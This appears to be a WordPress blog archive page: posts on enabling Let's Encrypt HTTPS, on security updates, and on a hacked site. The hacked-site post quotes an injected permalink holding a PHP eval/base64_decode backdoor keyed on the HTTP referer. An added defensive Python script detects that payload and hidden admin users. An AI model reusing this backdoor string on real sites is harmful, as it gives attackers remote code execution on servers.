Converting this WordPress site from http: to https: – Part 2

One of the things that kept me from the change to SSL was that my hosting company, Pair.com, did not have any nice (convenient) way to use the free Let’s Encrypt SSL certificates.

Pair now offers an easy one click interface to set up SSL and they automatically renew the certificates, so there’s really no excuse to not do it.

What does the interface look like? You go to the Manage Your SSL page and look for the button next to your domain name that says:

Click the Let’s Encrypt button and you’re good to go!

After a few minutes (so that you think the computer was doing some really difficult task) it’ll present you with your domain name with a super-intelligent shade of green lock next to it. All done with the easy part!

Now for the less easy part…


You can’t go out this Friday night, it’s time to update WordPress to Version 3.4.2

Holy mother of toad! Again! WordPress just loves to release those late-in-the-week security updates. We already know how hackers work — they do a file compare of the old WordPress version to the new one, then write some code to exploit the vulnerability, and then they set the code loose on whatever …

WordPress – Be Ready To Be Hacked Again

Ahh… the dreaded

3.0.4 Important Security Update

…a very important update to apply to your sites as soon as possible because it fixes a core security bug in our HTML sanitation library, called KSES. I would rate this release as “critical.”

Yeah. What that says to me is, “A hacker has already looked at the vulnerabilities in 3.0.3 and written a script to exploit it and deployed it on the websites he/she has already hacked so that it can go out and get access to even more web servers by simply crawling the web looking for WordPress installations that haven’t been updated yet.”


WordPress Security Exploits – This site was hacked

I still have no idea what this means.

I’m currently running WordPress 2.8.4 on this site.

One of my older sites was hacked as per

https://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/

and the permalinks were changed to

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

There was a hidden user named “WordPress” — JavaScript was being used to prevent the user from showing in the admin users section (and it didn’t show the user in the user count). My computer is running slow, so when looking at the user list this second user would appear and then disappear as the JavaScript executed. On a faster computer, it would have been impossible to see the hidden user. Dumbass JavaScript tricks.
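
A defender-side check for the two indicators described in this post, added here as an example (it is not code from the original post): it audits a permalink_structure value and a list of logins read directly from the database (in a default install, the wp_options and wp_users tables) rather than from the admin screen. The function names and the expected-user list are assumptions made for illustration.

```python
import re

# Structure tags WordPress documents for the permalink setting.
ALLOWED_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
                "post_id", "postname", "category", "author"}
# Substrings that indicate PHP code rather than a URL pattern.
CODE_MARKERS = ("eval(", "base64_decode", "$_SERVER", "${")


def audit_permalink(structure):
    """Return findings for one permalink_structure value (empty list = clean)."""
    findings = []

    def drop_tag(match):
        if match.group(1) not in ALLOWED_TAGS:
            findings.append("unknown tag %" + match.group(1) + "%")
        return ""

    # Remove well-formed %tag% placeholders; what remains must be plain path text.
    rest = re.sub(r"%([a-z_]+)%", drop_tag, structure)
    if re.search(r"[^A-Za-z0-9/_.-]", rest):
        findings.append("characters outside a URL path: " + rest.strip("/"))
    for marker in CODE_MARKERS:
        if marker in structure:
            findings.append("code marker " + marker)
    return findings


def unexpected_users(db_logins, expected_logins):
    """Logins present in the database that are not on the expected list."""
    known = {name.lower() for name in expected_logins}
    return sorted(n for n in db_logins if n.lower() not in known)


# Constructed sample data: the second permalink is the value quoted in the post.
SAMPLE_PERMALINKS = [
    "/%year%/%monthnum%/%day%/%postname%/",
    "/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",
]
SAMPLE_DB_LOGINS = ["admin", "WordPress"]  # constructed; "WordPress" as in the post

if __name__ == "__main__":
    for value in SAMPLE_PERMALINKS:
        print(value[:40], "->", audit_permalink(value) or "clean")
    print("unexpected users:", unexpected_users(SAMPLE_DB_LOGINS, ["admin"]))
```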
